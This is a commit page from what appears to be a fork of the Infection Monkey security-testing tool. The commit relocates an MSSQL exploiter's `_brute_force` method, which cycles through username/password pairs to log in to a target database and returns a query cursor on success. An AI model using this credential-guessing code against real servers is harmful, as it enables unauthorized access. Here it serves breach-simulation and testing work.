p15670423
/
monkey
1
0
Fork 5
Code Issues Pull Requests 3 Projects Releases Wiki Activity

Agent: Move _brute_force()

This commit is contained in:
Mike Salvatore 2022-06-14 14:32:41 -04:00
parent 04460e1d44
commit 339619cc56
1 changed files with 58 additions and 58 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

116
monkey/infection_monkey/exploit/mssqlexec.py
View File

@ -89,6 +89,64 @@ class MSSQLExploiter(HostExploiter):
self.exploit_result.propagation_success = True
return self.exploit_result
def _brute_force(self, host, port, users_passwords_pairs_list):
"""
Starts the brute force connection attempts and if needed then init the payload process.
Main loop starts here.
Args:
host (str): Host ip address
port (str): Tcp port that the host listens to
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce
with
Return:
True or False depends if the whole bruteforce and attack process was completed
successfully or not
"""
# Main loop
# Iterates on users list
credentials_iterator = interruptible_iter(
users_passwords_pairs_list,
self.interrupt,
"MSSQL exploiter has been interrupted",
logging.INFO,
)
for user, password in credentials_iterator:
try:
# Core steps
# Trying to connect
conn = pymssql.connect(
host,
user,
password,
port=port,
login_timeout=self.LOGIN_TIMEOUT,
timeout=self.QUERY_TIMEOUT,
)
logger.info(
f"Successfully connected to host: {host} using user: {user} and password"
)
self.exploit_result.exploitation_success = True
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
self.report_login_attempt(True, user, password)
cursor = conn.cursor()
return cursor
except pymssql.OperationalError as err:
logger.info(f"Connection to MSSQL failed: {err}")
self.report_login_attempt(False, user, password)
# Combo didn't work, hopping to the next one
pass
logger.warning(
"No user/password combo was able to connect to host: {0}:{1}, "
"aborting brute force".format(host, port)
)
raise FailedExploitationError(
"Bruteforce process failed on host: {0}".format(self.host.ip_addr)
)
def _create_temp_dir(self):
logger.debug(f"Creating a temporary directory: {MSSQLExploiter.TMP_DIR_PATH}")
@ -153,61 +211,3 @@ class MSSQLExploiter(HostExploiter):
def _stop_monkey_server(http_thread):
http_thread.stop()
http_thread.join(LONG_REQUEST_TIMEOUT)
def _brute_force(self, host, port, users_passwords_pairs_list):
"""
Starts the brute force connection attempts and if needed then init the payload process.
Main loop starts here.
Args:
host (str): Host ip address
port (str): Tcp port that the host listens to
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce
with
Return:
True or False depends if the whole bruteforce and attack process was completed
successfully or not
"""
# Main loop
# Iterates on users list
credentials_iterator = interruptible_iter(
users_passwords_pairs_list,
self.interrupt,
"MSSQL exploiter has been interrupted",
logging.INFO,
)
for user, password in credentials_iterator:
try:
# Core steps
# Trying to connect
conn = pymssql.connect(
host,
user,
password,
port=port,
login_timeout=self.LOGIN_TIMEOUT,
timeout=self.QUERY_TIMEOUT,
)
logger.info(
f"Successfully connected to host: {host} using user: {user} and password"
)
self.exploit_result.exploitation_success = True
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
self.report_login_attempt(True, user, password)
cursor = conn.cursor()
return cursor
except pymssql.OperationalError as err:
logger.info(f"Connection to MSSQL failed: {err}")
self.report_login_attempt(False, user, password)
# Combo didn't work, hopping to the next one
pass
logger.warning(
"No user/password combo was able to connect to host: {0}:{1}, "
"aborting brute force".format(host, port)
)
raise FailedExploitationError(
"Bruteforce process failed on host: {0}".format(self.host.ip_addr)
)